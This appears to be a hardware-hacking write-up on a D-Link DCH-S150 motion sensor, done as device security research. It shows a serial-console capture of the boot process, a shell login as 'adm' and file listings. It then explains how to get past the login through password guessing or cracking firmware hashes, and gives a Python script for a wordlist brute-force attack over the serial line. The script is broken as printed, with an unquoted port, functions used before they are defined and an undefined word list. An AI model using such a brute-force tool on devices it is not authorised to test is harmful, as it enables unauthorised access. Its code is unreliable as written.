--2019-04-15 02:08:13--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
[  System Message  ]:LAUNCHER PID = 481 .............
[  System Message  ]:START LINKD WATCHDOG.............
[  System Message  ]:LINKD &bindStr.............
[  System Message  ]:Linkd.out isn't running ,restarting..........
--2019-04-15 02:08:15--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `/tmp/getVersion'

    [<=>                                    ] 0           --.-K/s                  [ <=>                                   ] 101         --.-K/s   in 0s      

2019-04-15 02:08:15 (269 KB/s) - `/tmp/getVersion' saved [101]


starting pid 220, tty '/dev/ttyS0': '/bin/login'
DCH-G020 login: root
Password: 
Login incorrect
DCH-G020 login: adm
login: can't change directory to '/adm'


BusyBox v1.21.1--LSDK-10.2-00082-4 (2016-06-29 05:45:06 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ $ ls
bin         etc         linuxrc     proc        sys         var         www-ro
dch         etc-ro      lost+found  root        tmp         version
dev         lib         mnt         sbin        usr         www
/ $ a
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor
U-Boot 1.1.4--LSDK-10.1.432 (Apr  8 2014 - 17:07:58)

ap143 - Honey Bee 1.1

DRÁM:  32 MB
Top of RAM usable for U-Boot atº 8²000000
Reserving 134k for U-Boot at: 81fdã000
Reserving 192k for malloc() at: 81fac°00
Reserving 44 Bytes for Board Info at: ¸1fabfd4
Reserving 36 Bytes for Global Datá at: 81fabfb0
Reserving 128k for boot paráms() at: 81f8bfb0
Stack Pointer at: 81f8bæ98
Now running in RAM - U-Bïot at: 81fdc000
============================================
Date:Apr  8 2014  Timå:17:07:58
Loader Version: v1.00 Build:±0ŠMoäule Name: DCH-S150
================½==½==½=====================
Flash Manuf Id 0xc², DeviceId0 0x20, DeviceId1 0x17
flash siúe 8MB, sector count = 128
Flash:  8 MB
* Scan for Linux kernel images ...
* Backup mode Linux kernel found at 9F050000
* Linux kernel found at 9F2B0000
* Scan completed.
!!! 1 Backup mode and 1 other Linux kernel images found.

Using default environment

In:    serial
Out:   serial
Err:   serial
Net:   ath_gmac_enet_initializå...
ath_gíac_enet_initialize: reset mask:c02200
Scorpion ---->S27 PHY*
S27 reg init
: cfg1 0x800c0000 ãfg2 0x7114
eth0: c4:12:f5º1cº8eº4c
athrs27_phy_setup ATHR_PHY_CONTRÏL ´ :±000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 4 :10
eth0 up
Honey Bee ----¾  ÍAC 1 S27 PHY *
S27 reg init
ATHRS27: resetting s27
ATHRS27: s27 reset done
: cfg± 0x800c0000 cfg2 0x7214
eôh1º c´:12:f5:1c:8e:4c
athrs27_phy_setup ATHR_PHÙ_CONTROL 0 :1000
athrs27_phy_setup ATHR_PÈY_SPEC_STAUS 0 :10
athrs27_phy_setup ATHRßPHY_CONTROL 1 :1000
athrs27_phy_setup ATHÒ_PHY_SPEC_STAUS 1 :10
athrs27_phy_setup AÔHR_PHY_CONTROL 2 :1000
athrs27_phy_setup ÁTHR_PHY_SPEC_STAUS 2 :10
athrs27_phy_setuð AÔHR_PHY_CONTROL 3 :1000
athrs27_phy_setõp ÁTHR_PHY_SPEC_STAUS 3 :10
eth1 up
eth0, eth1
Setting 0x±81±62c0 to 0x3061a100
Hit any keù tï stop autoboot:  2 ��� 1 ��� 0
## Âooting image at 9f2b0000 ...
   Imaçe Name:   Linux Kernel Image
   Creáted:      2018-01-03   8:34:42 UTÃ
   Émage Type:   MIPS Linux Kernel Imáge (lzma compressed)
   Data Sizå:    832896 Bytes = 813.4 kB
   Loaä Address: 80002000
   Entry Point:  801dc3a0
   Verifying Checksum at 0x9f²b0040 ...OK
   Uncompressing Kernel Image .®. OK
No initrd
## Transferriîg control to Linux (at address 801dc³a0) ...
## Giving linux memsize in âytes, 33554432

Starting kernel ...

Booting QCA953x
Linux version 2.6.31 (root@minlee-Mint17) (gcc version 4.3.3 (GCC) ) #1 Wed Jan 3 16:27:59 CST 2018
flash_size passed from bootloader = 8
arg 1: console=ttyS0,115200
arg 2: root=31:08
arg 3: rootfstype=squashfs
arg 4: init=/sbin/init
arg 5: mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(log),896k(bk_uImage),1536k(bk_rootfs),896k(uImage),4032k(rootfs),2432k@0x50000(bk_firmware),4928k@0x2b0000(firmware),512k@0x780000(mydlink)
arg 6: mem=32M
CPU revision is: 00019374 (MIPS 24Kc)
ath_sys_frequency: cpu apb ddr apb cpu 550 ddr 400 ahb 200
Determined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
Zone PFN ranges:
  Normal   0x00000000 -> 0x00002000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00002000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 8128
Kernel command line: console=ttyS0,115200 root=31:08 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(log),896k(bk_uImage),1536k(bk_rootfs),896k(uImage),4032k(rootfs),2432k@0x50000(bk_firmware),4928k@0x2b0000(firmware),512k@0x780000(mydlink) mem=32M
PID hash table entries: 128 (order: 7, 512 bytes)
Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 23812k/32768k available (1912k kernel code, 8956k reserved, 396k data, 116k init, 0k highmem)
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 365.56 BogoMIPS (lpj=731136)
Mount-cache hash table entries: 512

****************ALLOC***********************
 Packet mem: 80270600 (0x600000 bytes)
********************************************

NET: Registered protocol family 16
bio: create slab <bio-0> at 0
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 1024 (order: 1, 8192 bytes)
TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
TCP: Hash tables configured (established 1024 bind 1024)
TCP reno registered
NET: Registered protocol family 1
ATH GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 46
alg: No test for stdrng (krng)
io scheduler noop registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
loop: module loaded
12 cmdlinepart partitions found on MTD device ath-nor0
Creating 12 MTD partitions on "ath-nor0":
0x000000000000-0x000000010000 : "u-boot"
0x000000010000-0x000000020000 : "ART"
0x000000020000-0x000000030000 : "MP"
0x000000030000-0x000000040000 : "config"
0x000000040000-0x000000050000 : "log"
0x000000050000-0x000000130000 : "bk_uImage"
0x000000130000-0x0000002b0000 : "bk_rootfs"
0x0000002b0000-0x000000390000 : "uImage"
0x000000390000-0x000000780000 : "rootfs"
0x000000050000-0x0000002b0000 : "bk_firmware"
0x0000002b0000-0x000000780000 : "firmware"
0x000000780000-0x000000800000 : "mydlink"
nf_conntrack version 0.5.0 (512 buckets, 2048 max)
TCP cubic registered
NET: Registered protocol family 10
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Bridge firewalling registered
arch/mips/atheros/gpio.c (ath_simple_config_init) RESET_BTN_GPIO: 17, RESET_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_BTN_GPIO: 2, WPS_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_LED_GPIO: 3, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) PIR_GPIO: 1, PIR_TRIGGER_LEVEL: 1
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO1: 3, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO2: 4
VFS: Mounted root (squashfs filesystem) readonly on device 31:8.
Freeing unused kernel memory: 116k freed
init started: BusyBox v1.21.1--LSDK-10.1.432 (2018-01-03 16:30:16 CST)
starting pid 135, tty '': '/etc/rc.d/rcS'
QCA953x Watchdog Timer enabled (30 seconds, nowayout)

Please press Enter to activate this console. 128+0 records in
128+0 records out
Wed Jan  3 00:00:00 UTC 2018
[control_center.c] dch mtd found: mtd11
[control_center.c] kernel jffs2 support detected.
[control_center.c] mount /dev/mtdblock11 to /dch.
128+0 records in
128+0 records out
qca955x_GMAC: Length per segment 1536
953x_GMAC: qca953x_gmac_attach
Link Int Enabled
qca953x_set_gmac_caps  CHECK DMA STATUS
mac:0 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 0 --> c4:12:f5:1c:8e:4c
asf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2581
953x_GMAC: qca953x_gmac_attach
Link Int Enabled
qca953x_set_gmac_caps  CHECK DMA STATUS
mac:1 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 1 --> c4:12:f5:1c:8e:4c
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2D81
ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, 11D)
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
brctl: iface ath1: No such device
athr_gmac_ring_alloc Allocated 8192 at 0x81cb0000
athr_gmac_ring_alloc Allocated 2048 at 0x81f13800
HONEYBEE ----> S27 PHY MDIO
ATHRS27: resetting s27
ATHRS27: s27 reset done
Setting Drop CRC Errors, Pause Frames and Length Error frames
Setting PHY...
/dev/watchdog device found. Try to launch watchdog daemon.
ath_ahb: 10.1.478 (Atheros/multi-bss)
__ath_attach: Set global_scn[0]
Enterprise mode: 0x03fc0000
Restoring Cal data from Flash
Green-AP : Green-AP : Attached

ath_get_caps[5956] rx chainmask mismatch actual 3 sc_chainmak 0
ath_get_caps[5931] tx chainmask mismatch actual 3 sc_chainmak 0
ADDRCONF(NETDEV_UP): eth1: link is not ready
SC Callback Registration for wifi0
wifi0: Atheros ???: mem=0xb8100000, irq=2
Invalid command : setVowExt
VAP device ath1 created
ath1
VAP device ath0 created
ath0

 DES SSID SET=DCH-S150-8E4C
 ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1
device ath0 entered promiscuous mode
 ieee80211_ioctl_siwmode: imr.ifm_active=131200, new mode=2, valid=1
device ath1 entered promiscuous mode
Successfully iniieee80211_ioctl_getparam : parameter 0x284 not supported
tialized wpa_supplicant
br0: port 2(ath1) entering learning state
killall: wifi_client_notifier: no process killed
br0: port 2(ath1) entering forwarding state
Control Center(169) : Recive a request(211) from 407
Wireless Center(201) : Recive a request(211) from 169
Control Center(169) : Recive a request(102) from 407
Lan Center(199) : Recive a request(102) from 169
Control Center(169) : Recive a request(409) from 199
Application Center(203) : Recive a request(409) from 169
Control Center(169) : Recive a response(409) from 203
Control Center(169) : Recive a request(410) from 199
Application Center(203) : Recive a request(410) from 169
Control Center(169) : Recive a request(414) from 199
Control Center(169) : Recive a request(8) from 199
DCHC Center(205) : Recive a request(3008) from 169
Application Center(203) : Recive a request(414) from 169
Control Center(169) : Recive a response(410) from 203
Control Center(169) : Recive a response(3008) from 205
Failed to kill daemon: No such file or directory
Lan Center(199) : Recive a response(409) from 169
Lan Center(199) : Recive a response(410) from 169
Lan Center(199) : Recive a response(414) from 169
Lan Center(199) : Recive a response(8) from 169
Control Center(169) : Recive a request(10) from 199
Lan Center(199) : Recive a response(10) from 169
Control Center(169) : Recive a response(102) from 199
Control Center(169) : Recive a response(414) from 203
Application Center(203) : Recive a request(424) from 169
killall: dch_scheduler: no process killed
Control Center(169) : Recive a response(424) from 203
Application Center(203) : Recive a request(419) from 169
killall: you need to specify whom to kill
Control Center(169) : Recive a response(419) from 203
Application Center(203) : Recive a request(421) from 169
killall: chkfwd: no process killed
Control Center(169) : Recive a response(421) from 203
Application Center(203) : Recive a request(426) from 169
killall: linkd: no process killed
killall: linkd.out: no process killed
Control Center(169) : Recive a response(426) from 203
Application Center(203) : Recive a request(417) from 169
killall: mdns-scan: no process killed
Control Center(169) : Recive a response(417) from 203
killall: crond: no process killed
Jan  3 00:00:24 crond[481]: crond: crond (busybox 1.21.1--LSDK-10.1.432) started, log level 8
Successfully iniieee80211_ioctl_getparam : parameter 0x284 not supported
tialized wpa_supplicant
Control Center(169) : Recive a response(211) from 201
Configuration fi ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1
le: /var/etc/oob DEVICE IS DOWN ifname=ath0
.ap_bss
 DEVICE IS DOWN ifname=ath0
ath0: Could not connect to kernel driver
Using interface ath0 with hwaddr 06:12:f5:1c:8e:4c and ssid 'DCH-S150-8E4C'
br0: port 1(ath0) entering learning state
br0: port 1(ath0) entering forwarding state
ath_tx_edma_tasklet: TXQ[3] tailindex 2
Jan  3 00:01:01 crond[481]: crond: USER root pid 541 cmd dch_scheduler mdns_watchdog
Jan  3 00:01:01 crond[481]: crond: USER root pid 547 cmd dch_scheduler webserver_watchdog
Jan  3 00:01:01 crond[481]: crond: USER root pid 553 cmd dch_scheduler ntp_watchdog
Control Center(169) : Recive a request(418) from 554
Application Center(203) : Recive a request(418) from 169
killall: you need to specify whom to kill
ntp1.dlink.com: Unknown host
Control Center(169) : Recive a response(418) from 203

starting pid 170, tty '/dev/ttyS0': '/bin/login'
MotionSensorDLink login: adm

/ $ ls /bin
ash            echo           ln             mv             sleep
busybox        ethreg         login          pidof          stat
cat            getopt         ls             ping           sync
chmod          grep           md             ping6          tar
cp             gzip           mkdir          ps             touch
date           hostname       mknod          rm             umount
dd             hush           mm             sed            uname
df             iperf3         more           setserial      vi
dnsdomainname  kill           mount          sh

/ $ ls /sbin
arp           halt          klogd         poweroff      syslogd
avahi-daemon  ifconfig      logread       reboot        udhcpc
blkid         init          lsmod         rmmod         zcip
fdisk         insmod        mdev          route

/ $ ls /usr/sbin
arping          fping           iwconfig        telnetd       
brctl           fping6          iwlist          tftpd
crond           hostapd         iwpriv          udhcpd
dhcprelay       hostapd_cli     rdate           wd_keepalive
fakeidentd      inetd           rdev            wpa_cli

/ $ ls /usr/bin
[                     dumpleases            run_migrate
[[                    exec_policy_action    scan_network
aes_alpha             factory_reset         send_dchc_event
app_center            find                  sqlite3
bundle_counter        free                  tail
ccrypt                fw_upgrade            test
chkfwd                fw_verify             top
config2flash          head                  tr
config_header         killall               tty
control_center        lan_center            update_chome
cut                   lighttpd              uptime
dch_scheduler         logger                wc
dchc_center           lsusb                 wget
delay_reboot          md5sum                wifi_center
dirname               mdns-scan             wifi_client_notifier
dlink_time_sync       nslookup              wlanconfig
du                    ntpclient             xargs

Live-Analysis

The Linux login can be the only challenge with this method by denying access to the live system. Common passwords for root should be tried first, but also other common usernames like admin should be tried. To automate the password guessing process, a simple Python script has been written which performs a wordlist attack over the serial connection. A simplified version of this script can be found below. Alternatively, if the password could not be guessed, the detour can be made via the firmware image, if it is available, either by download or chip extraction. This contains the hashed password, which can subsequently be processed using common password cracking techniques and tools. In this case the system has a password-protected root user, but it also has several other users without passwords that could be used to gain access to the root password hash. Password guessing or cracking is not always necessary, since some devices already offer full access to a root shell without password prompting, and some developers replace the standard Linux login with their own debugging applications. The mentioned Python script is nothing fancy, and, due to the delay in the Linux login process, very slow, but it is quite useful if there is no other way to retrieve the password or its hash more effectively. The script has to be customized for each device, and the corresponding login request messages have to be inserted into the script, which are displayed during the login process. The script scans the output for login requests messages and processes those until the password is found or the word list is finished.

ⓘ bruteforce_unix_login_over_serial.py
#!/usr/bin/env python3
import sys
import serial
import time
from pathlib import Path

# Configuration
un="root"
pw=None
messages = {
	"Login:" : sendUN,
	"Password:" : sendPW,
	"Login incorrect" : failed,
	"Other" : enter
}
timeout = time.time() + 60
ser=serial.Serial(
	port=/dev/ttyAMA0,
	baudrate=115200,
	parity=serial.PARITY_NONE,
	stopbits=serial.STOPBITS_ONE,
	bytesize=serial.EIGHTBITS,
	timeout=0.02
)

# Busines logic
def getMsg():
	return ser.readline().decode().strip()

def enter():
	ser.write(str.encode("\n"))
	return 0

def sendUN():
	global un
	ser.write(str.encode(un+"\n"))
	return 1

def sendPW():
	global pw
	ser.write(str.encode(pw+"\n"))
	return 2

def failed():
	enter()
	return 3

def trypw():
	while 1:
		msg = getMsg()
		func = messages.get(msg, enter)
		if func()  == 3:
			return 0
		if time.time() > timeout:
			return 1

# Main code
with open(wordlist) as f:
	for line in f:
		pw = line.strip()
		if trypw():
			print(pw)

# Teardown
ser.close()
exit()

Once Privileged access is obtained on the Linux shell, the system as a whole can be examined. This includes analysis of configurations, binaries, system properties, and many more.

Hardware

References